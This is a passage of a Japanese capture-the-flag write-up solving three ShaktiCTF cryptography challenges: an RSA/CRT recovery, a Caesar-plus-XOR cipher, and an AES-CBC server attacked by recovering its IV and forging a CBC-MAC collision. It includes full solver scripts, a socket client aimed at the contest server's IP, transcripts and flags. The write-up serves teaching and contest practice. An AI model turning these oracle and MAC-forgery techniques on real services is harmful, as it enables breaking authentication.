4302040125834928853558463909476079954473400865172251180160558435767130753932883186010390855112227834689861010095690778866857294344059634143100709544931839088413113732983879851609646261868420370506958223094475800449942079286436722629516277911423054845515342792094987249059810059640127872352101234638506603087565277395480953387647118861450659688484283820336767116038031727190397533082113134466893728210621302098082671125283992902107359805546865262918787687109747546968842757321383287635483017116189825332578143804402313162547301864633478350112638450973130720295084401400762328157586821639409421465548080122760881528019152451981418066119560584988658928643613995792058313513615847754001837873387949017975912403754727304537758597079167674369192909953480861392310713676253433998929652777155332408050107725317676660176980502406301244129743702460065671633250603271650634176695472477451658931634382635748322647891956353158570635160043 e = 65537 ct = 16958627479063955348415964384163116282602743039742753852934410863378528486785270030162782732192537726709536924276654783411884139339994697205619239406660459997082991141519385345070967253589282293949945894128620519748508028990727998488399564805026414462500253524261007024303476629172149332624303860869360966809845919057766279471870925180603362418449119409436609700813481467972962774900963043970140554494187496533636616384537667808308555402187685194879588448942654070984762583024927082993513125305565020701004973206532961944433936049713847420474363949095844995122469523084865481364653146506752587869477287886906616275417 x, _ = crt(n, c) n = secret // x print('[+] n =', n) p = 156613782007770984536049055700840395037085682399926189984796410929143868636172989598027406051641994725886674336805075334390044528511942285958708618671006005927130990180083143883853840126990685118290412751594654157367930730824790742241421921147161987915110899307344903473712967071752529319870067482601269289159 assert n == p ** 2 phi = p * (p - 1) d = inverse(e, phi) m = pow(ct, d, n) flag = long_to_bytes(m).decode() print('[*] flag:', flag)
復号結果は以下の通り。
[+] n = 24527876714777610556168704102334063247745307067942987179946992203143782911214218738693269763284353107444558551004104842495208613554362680493609315262323088218069305109094883023250460622553819850578030167910933028392613333549556209547555445147475324578694902644739395420556980677634640744378713609298141891560253460328397733071122264628468706243972435551492706426936176969047044900758569383152320313902601091822535952698142154712130550473808314533625099780507036524949344974327532792045713711551245809959038345909568860198589805752319051021759477458800632328558389734253607892450861044270982742648526813361769154927281 [*] flag: shaktictf{w0w_you_kn0w_h0w_RSA_&_CRT_w0rks_!}
shaktictf{w0w_you_kn0w_h0w_RSA_&_CRT_w0rks_!}
cAex0r (Cryptography 100)
暗号化の処理概要は以下の通り。
・stride: 1以上27以下のランダム整数 ・s1: flagの前半 ・s2: flagの後半 ・key: 3バイトランダム文字列 ・cass(s1+s2,stride) ・s1+s2の各文字に対して、以下の変換をして連結。 ・ASCIIコードが65以上90以下の場合、strideを引き、26で割った余りをインデックスとした英大文字 ・ASCIIコードが97以上122以下の場合、strideを引き、26で割った余りをインデックスとした英小文字 ・それ以外の場合そのまま ・c: keyと上記のXORの結果 →ファイル出力
strideでブルートフォースし、フラグが"sha"から始まることを前提にkeyを割り出し、それを使って復号する。
#!/usr/bin/env python3 from pwn import xor def is_printable(s): for c in s: if ord(c) < 32 or ord(c) > 126: return False return True u_alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' l_alpha = 'abcdefghijklmnopqrstuvwxyz' flag_head = b'sha' with open('ciphertext_15c434ca-401e-4497-b782-53050680758d.txt', 'rb') as f: c = f.read() for stride in range(1, 28): enc_flag_head = '' for i in flag_head: enc_flag_head += l_alpha[(l_alpha.find(chr(i)) - stride) % 26] key = xor(enc_flag_head.encode(), c[:3]) ct = xor(c, key) flag = '' for i in ct: if i >= 65 and i <= 90: flag += u_alpha[(u_alpha.find(chr(i)) + stride) % 26] elif i >= 97 and i <= 122: flag += l_alpha[(l_alpha.find(chr(i)) + stride) % 26] else: flag += chr(i) if is_printable(flag) and flag.endswith('}'): print(flag) break
shaktictf{welCom3_t0_cRyptOo_WoRLD_77846b12bfd9b91ebce67b236aa4}
d0uble_cbc (Cryptography 200)
サーバの処理概要は以下の通り。
・op: メニュー選択 ・opが1の場合 ・pt: 入力(16進文字列) ・ct: ptをhexデコードした後、AES-CBC暗号化したものを16進表記で表示 ・opが2の場合 ・ct: 入力(16進文字列) ・pt: ctをhexデコードした後、AES-CBC復号したものを16進表記で表示 ・opが3の場合 ・iv_detected: 入力(16進文字列) ・verify_iv: ivの16進文字列とiv_detectedが一致していたらTrue、そうでない場合はFalse ・verify_iv表示 ・verify_ivがTrueの場合 ・iv_detected: iv_detectedのhexデコード ・x: 入力 ・xが'0'の場合 ・msg: 入力(16進文字列)をhexデコード ・x = sign(iv_detected, key, msg) ・messageblocks: msgの16バイトごとの配列 ・tag: 最後のブロックの暗号 ・tagの16進表記を返却 ・xを表示 ・xが'1'の場合 ・msg1: 入力(16進文字列)をhexデコード ・msg2: 入力(16進文字列)をhexデコード ・msg1とmsg2が同じ場合、NG ・msg1とmsg2が異なり、signが同じ場合、フラグを表示 ・opが4の場合、終了
平文1ブロック目(P1) ^ iv --(AES暗号)--> 暗号1ブロック目(C1) 平文2ブロック目(P2) ^ C1 --(AES暗号)--> 暗号2ブロック目(C2)
上記から、適当な16バイト未満の平文を暗号化する。
P1 ^ iv --(AES暗号)--> C1
次にC1 + C1を復号する。
C1 --(AES復号)--> P1 ^ iv C1 --(AES復号)--> P2 ^ C1
P1 ^ iv = P2 ^ C1なので、以下でivがわかる。
iv = (P2 ^ C1) ^ P1
異なる平文で最後の暗号ブロックが同じになるものを指定する必要がある。
平文1ブロック目(P1) ^ iv --(AES暗号)--> 暗号1ブロック目(C1) 平文2ブロック目(P2) ^ C1 --(AES暗号)--> 暗号2ブロック目(C2)
再び上記のイメージで考え、適当な16の平文を暗号化する。
P1 ^ iv --(AES暗号)--> C1
P1 = P1、P2 = P1 ^ iv ^ C1となるものを指定すれば、以下のように暗号化される。
P1 ^ iv --(AES暗号)--> C1 P2 ^ C1 = P1 ^ iv --(AES暗号)--> C1
どちらも最後のブロックの暗号はC1となり、同じtag(signature)が得られる。
#!/usr/bin/env python3 import socket from Crypto.Util.Padding import pad from Crypto.Util.strxor import strxor def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) host = '65.2.136.80' port = 30060 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) data = recvuntil(s, b'exit\n').rstrip() print(data) pt = b'ABC' h_pt = pt.hex() print('1') s.sendall(b'1\n') data = recvuntil(s, b'format\n').rstrip() print(data) data = recvuntil(s, b'\n').rstrip() print(data) print(h_pt) s.sendall(h_pt.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) ct = bytes.fromhex(data.split(' ')[-1]) s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) data = recvuntil(s, b'exit\n').rstrip() print(data) ct2 = ct + ct h_ct2 = ct2.hex() print('2') s.sendall(b'2\n') data = recvuntil(s, b'decrypt\n').rstrip() print(data) print(h_ct2) s.sendall(h_ct2.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) pt2 = bytes.fromhex(data.split(' ')[-1]) iv = strxor(strxor(pt2[16:], ct), pad(pt, 16)) h_iv = iv.hex() print('[+] iv:', iv.decode()) s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) data = recvuntil(s, b'exit\n').rstrip() print(data) pt = b'0123456789abcdef' h_pt = pt.hex() print('3') s.sendall(b'3\n') data = recvuntil(s, b'\n').rstrip() print(data) print(h_iv) s.sendall(h_iv.encode() + b'\n') data = recvuntil(s, b'messages\n').rstrip() print(data) print('0') s.sendall(b'0\n') data = recvuntil(s, b'\n').rstrip() print(data) data = recvuntil(s, b'\n').rstrip() print(data) print(h_pt) s.sendall(h_pt.encode() + b'\n') data = recvuntil(s, b'message\n').rstrip() print(data) data = recvuntil(s, b'\n').rstrip() print(data) c1 = bytes.fromhex(data) pt2 = pt + strxor(strxor(pt, iv), c1) h_pt2 = pt2.hex() s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) data = recvuntil(s, b'exit\n').rstrip() print(data) print('3') s.sendall(b'3\n') data = recvuntil(s, b'\n').rstrip() print(data) print(h_iv) s.sendall(h_iv.encode() + b'\n') data = recvuntil(s, b'messages\n').rstrip() print(data) print('1') s.sendall(b'1\n') data = recvuntil(s, b': \n').rstrip() print(data) print(h_pt) s.sendall(h_pt.encode() + b'\n') data = recvuntil(s, b': \n').rstrip() print(data) print(h_pt2) s.sendall(h_pt2.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) s.close()
実行結果は以下の通り。
******************************Welcome to the john's CBC server************************ You really wanna get into the system? then search for IV Choose 1 option among four 1.Encrypt the plain text 2.Decrypt the ciphertext 3.feed IV 4.exit 1 I will provide the encrypted text for you Input the plaintext in hex format 414243 cipher text for provided 60893f316b9e68c2eab9872a09923e15 ******************************Welcome to the john's CBC server************************ You really wanna get into the system? then search for IV Choose 1 option among four 1.Encrypt the plain text 2.Decrypt the ciphertext 3.feed IV 4.exit 2 I will provide the reasonable plaintext for you Input the cipher text in bytes to decrypt 60893f316b9e68c2eab9872a09923e1560893f316b9e68c2eab9872a09923e15 decrypted text for provided 4142430d0d0d0d0d0d0d0d0d0d0d0d0d6094145d16e31c9084d6e97869f0577d [+] iv: A_happy_cbc_mode ******************************Welcome to the john's CBC server************************ You really wanna get into the system? then search for IV Choose 1 option among four 1.Encrypt the plain text 2.Decrypt the ciphertext 3.feed IV 4.exit 3 Provide reasonable IV to proceed further 415f68617070795f6362635f6d6f6465 Yooo... you are going good, move forward with some more courage True Let me see whether you are worth enough to gain my gold coins. To prove yourself, give me two different hex-encoded messages that could sign to the same tag. Now press '0' to get your hex inputs signed and press 1 to submit two same messages 0 Input hash encoded message: 30313233343536373839616263646566 Tag for your message 7d4d21e02235e1fd646b36e147970d7c ******************************Welcome to the john's CBC server************************ You really wanna get into the system? then search for IV Choose 1 option among four 1.Encrypt the plain text 2.Decrypt the ciphertext 3.feed IV 4.exit 3 Provide reasonable IV to proceed further 415f68617070795f6362635f6d6f6465 Yooo... you are going good, move forward with some more courage True Let me see whether you are worth enough to gain my gold coins. To prove yourself, give me two different hex-encoded messages that could sign to the same tag. Now press '0' to get your hex inputs signed and press 1 to submit two same messages 1 Message #1: 30313233343536373839616263646566 Message #2: 303132333435363738396162636465660c237bb26670ae953f3034dc499c0c7f b'shaktictf{double_cheese_double_mac_yummyyyy_4120686170707920636263206d6f6465}'
shaktictf{double_cheese_double_mac_yummyyyy_4120686170707920636263206d6f6465}